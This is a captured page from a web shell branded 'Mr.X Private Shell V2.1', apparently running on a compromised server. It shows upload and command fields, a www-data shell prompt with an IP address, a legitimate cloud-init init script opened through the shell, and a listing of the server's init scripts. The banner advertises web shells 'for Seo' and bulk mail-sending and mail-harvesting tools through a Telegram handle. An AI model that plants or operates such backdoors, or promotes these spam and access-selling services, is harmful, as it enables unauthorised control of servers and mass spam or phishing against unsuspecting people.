__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.153: ~ $
#! /bin/sh
### BEGIN INIT INFO
# Provides:          cloud-final
# Required-Start:    $all cloud-config
# Required-Stop:     $remote_fs
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Cloud init modules final jobs
# Description:       This runs the cloud configuration initialization "final" jobs
#                    and can be seen as the traditional "rc.local" time for the cloud.
#                    It runs after all cloud-config jobs are run
### END INIT INFO

# Authors: Julien Danjou <acid@debian.org>
#          Juerg Haefliger <juerg.haefliger@hp.com>
#          Thomas Goirand <zigo@debian.org>

PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="Cloud service"
NAME=cloud-init
DAEMON=/usr/bin/$NAME
DAEMON_ARGS="modules --mode final"
SCRIPTNAME=/etc/init.d/$NAME

# Exit if the package is not installed
[ -x "$DAEMON" ] || exit 0

# Read configuration variable file if it is present
[ -r /etc/default/$NAME ] && . /etc/default/$NAME

# Define LSB log_* functions.
# Depend on lsb-base (>= 3.2-14) to ensure that this file is present
# and status_of_proc is working.
. /lib/lsb/init-functions

if init_is_upstart; then
	case "$1" in
	stop)
		exit 0
	;;
	*)
		exit 1
	;;
	esac
fi

case "$1" in
start)
	log_daemon_msg "Starting $DESC" "$NAME"
	if grep -q 'cloud-init=disabled' /proc/cmdline; then
		log_daemon_msg "$NAME is disabled via /proc/cmdline."
		exit 0
	elif test -e /etc/cloud/cloud-init.disabled; then
		log_daemon_msg "$NAME is disabled via cloud-init.disabled."
		exit 0
	fi

	$DAEMON ${DAEMON_ARGS}
	case "$?" in
		0|1) log_end_msg 0 ;;
		2) log_end_msg 1 ;;
	esac
;;
stop|restart|force-reload)
	echo "Error: argument '$1' not supported" >&2
	exit 3
;;
*)
	echo "Usage: $SCRIPTNAME {start}" >&2
	exit 3
;;
esac

:

Filemanager

Name Type Size Permission Actions
K01apache-htcacheclean File 2.43 KB 0755
K01fio File 734 B 0755
K01gdomap File 974 B 0755
S01apache2 File 7.95 KB 0755
S01bluetooth File 2.88 KB 0755
S01cloud-config File 1.58 KB 0755
S01cloud-final File 1.71 KB 0755
S01cloud-init-local File 1.49 KB 0755
S01cloud-init-main File 1.56 KB 0755
S01console-setup.sh File 1.21 KB 0755
S01cron File 3.03 KB 0755
S01cups File 2.74 KB 0755
S01cups-browsed File 1.92 KB 0755
S01dbus File 3.08 KB 0755
S01lightdm File 2.55 KB 0755
S01mariadb File 8.27 KB 0755
S01named File 3.33 KB 0755
S01nmbd File 1.26 KB 0755
S01plymouth File 1.35 KB 0755
S01rsync File 4.31 KB 0755
S01samba-ad-dc File 1.61 KB 0755
S01saned File 2.17 KB 0755
S01smbd File 1.59 KB 0755
S01ssh File 3.96 KB 0755
S01sudo File 1.13 KB 0755
S01vsftpd File 2.05 KB 0755
S01winbind File 1.47 KB 0755
Filemanager